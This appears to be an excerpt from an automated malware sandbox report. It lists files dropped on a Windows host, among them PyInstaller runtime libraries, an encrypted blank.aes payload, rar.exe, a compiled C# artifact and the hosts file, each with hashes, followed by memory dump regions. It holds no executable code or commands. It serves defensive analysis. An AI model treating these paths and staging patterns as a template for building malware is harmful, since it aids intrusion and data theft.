SHA5127df08363f70e89bbf7bf8eacb6fac4676cc327432031be97018bf0813c2bcf2503c1a515fbcae49d934259eeb98753f27a46aa93bae65b6f07fa4de8db11a77a
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\_ssl.pydFilesize
58KB
MD56890cf4a41154fd5eb741aab2f871abe
SHA199a13272975913959bb6f558009172f328840809
SHA256f5da1fdb25fbd540e22c9a9cb037a6586f5500407b7ab2202c01a85e7ffc60c7
SHA5121ffde8bf417fba246de4c8384fc6e0a84eeb2a2a36e76d26bd76218653e3a452be7ac0a6f41b4d20c58c7b5b640d41ad7f1bb9f7eaebf54b7d893c9b1c595b94
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\base_library.zipFilesize
858KB
MD5ba9562ca1b287c33cd28fdc4bf937bac
SHA1348dc56670b0d64f314ddf1d87fba637eb3781b1
SHA256132df278615808a6835977303df21a8f1c44afb1d60cbea1d28040cdd3152c50
SHA5129a5e01220de9849b38a398060feb05f14d714cdc773dc2f985d765736ec7515d5eecbc1d31511f4ba29c1d8ffc71c90ea158c0f301ebf861196ca7819d16282f
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\blank.aesFilesize
78KB
MD553b39c1db558e2512d586de9ba31a0a7
SHA1bae6e65538a493636aee37c70f88775a6aedc28c
SHA25622fa23e16a1989e98dc79237273776af5dc434af0dd13ef06ab3f55d31a143d3
SHA5125b54bd6dc42613dc62e0cc5fccff7acbcba8ef6357cdfb4a33fe7e3cfb9933670908d07a9081d5c75934a8c70e3631ff5ad62cb4d1cb32b579bf7f091d9ac37f
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\libcrypto-1_1.dllFilesize
1.1MB
MD53cc020baceac3b73366002445731705a
SHA16d332ab68dca5c4094ed2ee3c91f8503d9522ac1
SHA256d1aa265861d23a9b76f16906940d30f3a65c5d0597107ecb3d2e6d470b401bb8
SHA5121d9b46d0331ed5b95dda8734abe3c0bd6f7fb1ec9a3269feab618d661a1644a0dc3bf8ac91778d5e45406d185965898fe87abd3261a6f7f2968c43515a48562c
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\libffi-7.dllFilesize
23KB
MD56f818913fafe8e4df7fedc46131f201f
SHA1bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA2563f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA5125473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\libssl-1_1.dllFilesize
200KB
MD57f77a090cb42609f2efc55ddc1ee8fd5
SHA1ef5a128605654350a5bd17232120253194ad4c71
SHA25647b63a9370289d2544abc5a479bfb27d707ae7db4f3f7b6cc1a8c8f57fd0cf1f
SHA512a8a06a1303e76c76d1f06b689e163ba80c1a8137adac80fab0d5c1c6072a69d506e0360d8b44315ef1d88cbd0c9ac95c94d001fad5bc40727f1070734bbbbe63
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\python310.dllFilesize
1.4MB
MD5eafedc49e95f93cc69fa70d11464739a
SHA15a7b34a532343079db59040d67bb7a759ffa5824
SHA256de5b207dee9557a5890b48f285b5620fea84b997936546535d6584e3308353e0
SHA512be8cf25fb36ccac7955335706934bdb79cd578b382d51e6f4f36302d356b605beee2b1a38394de630cf2481d8217329979e1fa204577e68bd9f7708b49e9085f
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\rar.exeFilesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\rarreg.keyFilesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\select.pydFilesize
21KB
MD542ce8ef7969b86745cd3fb035584c8e2
SHA1cf9a02b2f39f53c6aa07e120a5e2c27d6720ddd8
SHA25681da10d1155d92e718b6327354d67e6155dbb0f259898d7022ed108ce324666f
SHA51254e88f2c5133afe3f4be1c7153b8d99c6c9f0905bbe10a8293397df07c645b486c8407673f96304a023ffc4d2b3fd7f647386c517a613cfe6704d36c04440c5f
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\sqlite3.dllFilesize
611KB
MD5241828cdf3e58cab1358f400f8c6a9a8
SHA1b6b144baa4a6ec6e2513e4fa3aed0fb926a96945
SHA256d86c010967d4cace371f5d389086eb30238eae5ee56f1528c423e80d73eb1ba8
SHA51284a099c0d1e61288a33803c956cb9af6cf991b0537f21cb2425def734aa5c3ca7950fcf972aeff0c2d770ac201935e179b0318fd0a935916508f4c1649b65ba8
-
C:\Users\Admin\AppData\Local\Temp\_MEI8842\unicodedata.pydFilesize
285KB
MD54f1cd395e988b9865e19118f8b1e90a2
SHA1618d99eb2e5f93cce4a9ae92f2729a39a1bb1974
SHA256e7cc3d41487ce9f9571a8a75bb35d882a9c746f15f7e46bc644de01290f55581
SHA512c23f4a0976f5c8bf9b149fc39b2b0e3b844ca040e398c50b768565326f20962777b3014381d904e16a0256655ef62234c7beb3f7fc1c458928b70ec305824d83
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tunacv5w.umj.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\d5w4if3b\d5w4if3b.dllFilesize
4KB
MD548445b9f18e45b2c03daa8b7401c18d0
SHA15f1b7754b07fd265d863a5e72c394b7d1e051afb
SHA2563f24a963810bd78ac34f881dd5798a4f811789e47bbf1641c0cb8d95b61e2973
SHA51222f44b8754e4281b65950c7b0839cc932ccc59d232ccdfffd739327792dc6c26d7270cfb69332025a153e4048d903927b3ca14cddcb56cb1538cb93b0c12c295
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docxFilesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docxFilesize
11KB
MD54a8fbd593a733fc669169d614021185b
SHA1166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA5126b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docxFilesize
11KB
MD5bfbc1a403197ac8cfc95638c2da2cf0e
SHA1634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docxFilesize
11KB
MD53b068f508d40eb8258ff0b0592ca1f9c
SHA159ac025c3256e9c6c86165082974fe791ff9833a
SHA25607db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\StopConvertTo.xlsFilesize
1.9MB
MD5635391bdef6564b929c29d2cc48b2fb4
SHA10ea3ce809e7bf40eef92d970d58e516c19073622
SHA256d748c5dd460f618c962f7d091def102ee46e805013483a63847040a2eac25d56
SHA512947a8b7c19c41d0d2023942a2f95da661ef0691f9d3420802757565b6d057d1db84a545c75848b197b8bf535d1ac492fa6b7354eff2996255546d10548235543
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\TestBackup.vsdxFilesize
967KB
MD545dc1f183bdec728041c2b27fdba0871
SHA1f4347db92f92f1f0548b27a797771f72b1c33d01
SHA25690cd22cd928c81b9fd6a67349b583a6bdcc545246b13f09ca2bc35bda8993aa8
SHA5128dd80092b746f91f25811af317b5e7dd9ce65260c60ecc59da09c558fe9b1484a12165444c5370d349f6df34e733c664ce73e4410172001e7fbb074980f22009
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docxFilesize
11KB
MD587cbab2a743fb7e0625cc332c9aac537
SHA150f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA25657e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA5126b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\WaitOut.docFilesize
1.1MB
MD5f1382830233782ced68fe5f9e8c32c3b
SHA13550b18ee173c76b8723a6798c2381025d43f6a2
SHA2561230d7f77e8fd5d5bd2f2a9414ac536aee638102fce28649fa84f81419aa4f0b
SHA5122fbfd035fe84c37a53a6ec307998e8fd7d8e9d78b07e6a7e0e677a41a94b720d3db7aca9fa702d9647cff6121971650c7efdb69528bb02ede4821b56755dbfb8
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\BackupUse.dwgFilesize
513KB
MD5701cfd7e9892dd2a1c126ffeefb20fcb
SHA13bff0855dc5293c0d740713c4989e3de3c974973
SHA2562f2f225756fe7c46a21136f1f3dfabffd377315a36e1f2aa627c2567e6c4d19d
SHA51266cad060eeeca5b2b850846c9a35b7b154258baea7b025a1ec7aaec419ab76eb1aa3fd97ae847bad4a108924aadd0c2255920411b568c39f59e61283d316b849
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\ShowAssert.mp4Filesize
1.7MB
MD58159fed72a451c624da8691fdac7d292
SHA1127354eed94b38b547c76d1eb1c565b44d589bba
SHA256b140002be32239f93d2bdd92f5f59eb8f2a7434ba052e62dedc28eb8dfd8e58c
SHA512cb9b8a87e370cf9ae8ca8048239885c14861fb7656c2c747e243c61ca35163173a59fac424541fd9ed785dda70d23f61ebc9eba4085c800920edbbc75179cd7e
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\SubmitDisable.docxFilesize
719KB
MD576012d0f5280c10002aeb4bb446ff771
SHA115bc862fe7c6342f99fe503f9bb5e0829a4114dd
SHA256430e366328ac4e6e7e3a65961d792eed88fa9ea9be4ae659c3f9707a7c78820a
SHA512962eb44ecac943bcd1aa5522afcdc325090d25f1b7ed6a730bebbfc6dbf46987523e26bc21318f25ac868e8ce75e7784e52796fa8d19f3e399d63a573c539667
-
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Downloads\UnregisterMount.mp3Filesize
796KB
MD5f70572f26b2f0f2d13f380741c02357d
SHA131b4dfcc8b36411fd0cd52330ff8730dcfeb218f
SHA256536a888e852ab2351ae2f0662c842a38d567068157e8aebf44cd546d96d99495
SHA512b71fe4669bb69fd50c9a555be220d5368c07e3f76e91ada13e168c97fc397595b16089a964f43d39bcd23072a2f1f25797e073185adf0b7ac01134f8503f5f80
-
C:\Windows\System32\drivers\etc\hostsFilesize
2KB
MD5f99e42cdd8b2f9f1a3c062fe9cf6e131
SHA1e32bdcab8da0e3cdafb6e3876763cee002ab7307
SHA256a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0
SHA512c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6
-
\??\c:\Users\Admin\AppData\Local\Temp\d5w4if3b\CSC86CCA3C9AAB940A2BABEDC64879E02F.TMPFilesize
652B
MD5dab3669d24bc571d072de74d97b70e08
SHA12437ac45c02fa49f4280aaefae4fbc4688a71901
SHA256bc6cadcaa494af1a177c3323e1a27151c9bf852f3eb5719e14a3d5c201899d2d
SHA512cb39e8444e4a4e4e4b5aa601d392572ef12392cd7fba65a44e78ea3f23cdd1223524d5da4bde04f4507017a02b4ded0d88cd013496e1168c79c4a394428f4e0f
-
\??\c:\Users\Admin\AppData\Local\Temp\d5w4if3b\d5w4if3b.0.csFilesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
\??\c:\Users\Admin\AppData\Local\Temp\d5w4if3b\d5w4if3b.cmdlineFilesize
607B
MD5d560a2b2854cd7cf574d1351bbfe2b74
SHA12843bc9dfe564a1f1649e6c570128b84fc879d1d
SHA256a68662eb8a81bd06b433ff486ff75d8a2849fd999902922a27430c493ba0aa7f
SHA51215751b4c8a9a748c67f0164157495b200910685c47189b425d4e8d66c6ed3b3f824e4199c2411546f67e276f022b0c04dcd9d7a1ce5eeab4ef4f36bec8f7d0c7
-
memory/456-90-0x0000018BA80E0000-0x0000018BA8102000-memory.dmpFilesize
136KB
-
memory/540-343-0x00007FF957030000-0x00007FF95705E000-memory.dmpFilesize
184KB
-
memory/540-331-0x00007FF957290000-0x00007FF9572A5000-memory.dmpFilesize
84KB
-
memory/540-79-0x00007FF95A650000-0x00007FF95A674000-memory.dmpFilesize
144KB
-
memory/540-330-0x00007FF9471C0000-0x00007FF947537000-memory.dmpFilesize
3.5MB
-
memory/540-80-0x00007FF956670000-0x00007FF956788000-memory.dmpFilesize
1.1MB
-
memory/540-77-0x00007FF957300000-0x00007FF95730D000-memory.dmpFilesize
52KB
-
memory/540-70-0x00007FF956E40000-0x00007FF956EF7000-memory.dmpFilesize
732KB
-
memory/540-71-0x00007FF9471C0000-0x00007FF947537000-memory.dmpFilesize
3.5MB
-
memory/540-72-0x000001D7448C0000-0x000001D744C37000-memory.dmpFilesize
3.5MB
-
memory/540-66-0x00007FF957030000-0x00007FF95705E000-memory.dmpFilesize
184KB
-
memory/540-64-0x00007FF95A620000-0x00007FF95A62D000-memory.dmpFilesize
52KB
-
memory/540-62-0x00007FF957130000-0x00007FF957149000-memory.dmpFilesize
100KB
-
memory/540-60-0x00007FF947540000-0x00007FF9476B1000-memory.dmpFilesize
1.4MB
-
memory/540-58-0x00007FF9573E0000-0x00007FF9573FE000-memory.dmpFilesize
120KB
-
memory/540-57-0x00007FF95CA80000-0x00007FF95CA98000-memory.dmpFilesize
96KB
-
memory/540-54-0x00007FF957150000-0x00007FF95717C000-memory.dmpFilesize
176KB
-
memory/540-302-0x00007FF9573E0000-0x00007FF9573FE000-memory.dmpFilesize
120KB
-
memory/540-30-0x00007FF95A650000-0x00007FF95A674000-memory.dmpFilesize
144KB
-
memory/540-277-0x00007FF957150000-0x00007FF95717C000-memory.dmpFilesize
176KB
-
memory/540-25-0x00007FF947AD0000-0x00007FF947F32000-memory.dmpFilesize
4.4MB
-
memory/540-310-0x00007FF957130000-0x00007FF957149000-memory.dmpFilesize
100KB
-
memory/540-332-0x00007FF957300000-0x00007FF95730D000-memory.dmpFilesize
52KB
-
memory/540-318-0x00007FF947540000-0x00007FF9476B1000-memory.dmpFilesize
1.4MB
-
memory/540-76-0x00007FF957290000-0x00007FF9572A5000-memory.dmpFilesize
84KB
-
memory/540-48-0x00007FF95E8C0000-0x00007FF95E8CF000-memory.dmpFilesize
60KB
-
memory/540-314-0x00007FF9471C0000-0x00007FF947537000-memory.dmpFilesize
3.5MB
-
memory/540-313-0x00007FF956E40000-0x00007FF956EF7000-memory.dmpFilesize
732KB
-
memory/540-304-0x00007FF95A650000-0x00007FF95A674000-memory.dmpFilesize
144KB
-
memory/540-303-0x00007FF947AD0000-0x00007FF947F32000-memory.dmpFilesize
4.4MB
-
memory/540-312-0x00007FF957030000-0x00007FF95705E000-memory.dmpFilesize
184KB
-
memory/540-317-0x00007FF956670000-0x00007FF956788000-memory.dmpFilesize
1.1MB
-
memory/540-339-0x00007FF9573E0000-0x00007FF9573FE000-memory.dmpFilesize
120KB
-
memory/540-344-0x00007FF956E40000-0x00007FF956EF7000-memory.dmpFilesize
732KB
-
memory/540-75-0x00007FF947AD0000-0x00007FF947F32000-memory.dmpFilesize
4.4MB
-
memory/540-342-0x00007FF95A620000-0x00007FF95A62D000-memory.dmpFilesize
52KB
-
memory/540-341-0x00007FF957130000-0x00007FF957149000-memory.dmpFilesize
100KB
-
memory/540-340-0x00007FF947540000-0x00007FF9476B1000-memory.dmpFilesize
1.4MB
-
memory/540-338-0x00007FF95CA80000-0x00007FF95CA98000-memory.dmpFilesize
96KB
-
memory/540-337-0x00007FF957150000-0x00007FF95717C000-memory.dmpFilesize
176KB
-
memory/540-336-0x00007FF95E8C0000-0x00007FF95E8CF000-memory.dmpFilesize
60KB
-
memory/540-335-0x00007FF95A650000-0x00007FF95A674000-memory.dmpFilesize
144KB
-
memory/540-334-0x00007FF947AD0000-0x00007FF947F32000-memory.dmpFilesize
4.4MB
-
memory/540-333-0x00007FF956670000-0x00007FF956788000-memory.dmpFilesize
1.1MB
-
memory/784-291-0x000002DBEEA80000-0x000002DBEEC9C000-memory.dmpFilesize
2.1MB
-
memory/784-290-0x000002DBEEA30000-0x000002DBEEA78000-memory.dmpFilesize
288KB
-
memory/3312-195-0x0000024E36F80000-0x0000024E36F88000-memory.dmpFilesize
32KB